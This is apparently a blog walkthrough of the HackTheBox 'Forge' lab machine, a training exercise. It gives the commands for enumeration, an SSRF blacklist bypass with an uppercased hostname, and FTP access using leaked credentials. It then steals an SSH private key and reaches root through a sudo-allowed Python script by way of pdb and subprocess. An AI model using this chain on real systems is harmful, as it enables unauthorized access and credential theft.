HTB — Forge Walkthroughs

Enumeration

Scan forge machine with nmap, using command :

nmap -sV -sC {ip}

  • -sV — shows port versions
  • -sC — run script scan

As we can see only 21, 22 and 80 ports are opened

  • 21 — FTP
  • 22 — SSH
  • 80 — HTTP

port 80 contains http://forge.htb address. so add it into /etc/hosts file.

next when we open http://forge.htb, we should be able to see website

make directory scan with FFUF

ffuf -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://forge.htb/FUZZ

  • -c — colored status codes
  • -w — wordlist path
  • -u — website address

after this, we will notice that only interesting folder is upload directory, where we can upload files from our machine and from website address.

at this point we can upload php reverse shell or image file which contain reverse shell in metatada, but that attack vector does not work. we should enumerate more…

lets make DNS scan with ffuf :

ffuf -c -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H “HOST : FUZZ.forge.htb” -u http://forge.htb/ -fl 10

  • -c — colored status codes
  • -w — wordlist path
  • -H — make DNS payload
  • -u — target address
  • -fl — ignore lines in response code

result shows that there is admin subdomain. add it into /etc/hosts file and open that address

unfortunately this page is allowed for localhost only. We can use burp suite to bypass IP restrictions

  • X-Originating-IP: 127.0.0.1
  • X-Forwarded-For: 127.0.0.1
  • X-Remote-IP: 127.0.0.1
  • X-Remote-Addr: 127.0.0.1

but it does not work. for more information open this LINK

we will notice that we can upload files from website. lets upload admin.forge.htb into it.

here we go. we see that this address is blacklisted. so lets bypass this restriction.

use address like http://ADMIN.FORGE.HTB instead of http://admin.forge.htb

We bypassed restriction, but it is not what we except, because address does not contain anything.

at this point we should use CURL to see content of this address.

as we can see, we are able to see content of this address. dig into the code and see that /announcements folder is available, so send http://ADMIN.FORGE.HTB/announcements into upload directory

and again use curl to see content of this address.

congratulations, we got FTP credentials user:heightofsecurity123!

but FTP is filtered, which means that we can access it only from localhost. we have to access it via browser. as it is mentioned in the code, admin.forge.htb/upload address have FTP and FTPS support. so use that credentials to login that address via FTP.

send http://ADMIN.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@FORGE.HTB into upload directory

open with curl and we be able to see user.txt

to open user.txt, send http://ADMIN.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@FORGE.HTB/user.txt into upload directory and open it via CURL.

congratulations, we got user.txt but what about privilege escalation ?

Privilege Escalation

Firstly we need to gain access on the server via SSH. we can do it with id_rsa key which is into .ssh folder of FTP.

send http://ADMIN.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@FORGE.HTB/.ssh/ into upload directory and then open link via CURL. result should be like this

at this point we can steal id_rsa and then login with ssh with command :

ssh -i id_rsa user@forge.htb

We are in.

after command sudo -l (which tell us on which files we have sudo access ) we will notice that we have sudo access to /opt/remote-manage.py.

lets dig into the code.

our goal is to run the program with a pdb module. for it we have to make another ssh conenction, run /usr/bin/python3 /opt/remote-manage.py , and then connect via nc

run /usr/bin/python3 /opt/remote-manage.py

connect via nc from another ssh connection and enter password secretadminpassword which is stored into remote-manage.py

note that in your case connect port will be different

next we have to break program to run pdb module. press CTRL+C

then you will get pdb debugging mode on the first ssh connection

after this we can run command : subprocess.run(“cat /root/root.txt”, shell=True) to get root.txt content.

Congratulations…

--

--

--

Infosec/Pentester

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Python Variables and getting input from USER

A/B tests developer’s manual

Reflective Practice in Agile Software Development

Everything I learned | Week 10| Encora/Nearsoft Academy

operating system Interview questions

operating system questions and answers

KingSpeed announces INO Launchpad — Babylons

5 Things to Consider When Deploying a New Major Feature to Production

How to deploy a gRPC Service on Google Kubernetes Engine (w/ TLS Encryption Support)

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store

Giorgi Barbakadze

Infosec/Pentester

More from Medium

HTB-Shocker

HTB: Secret

HTB — CAP Walkthrough

Mustacchio Walkthrough | Try Hack Me | Ally Petitt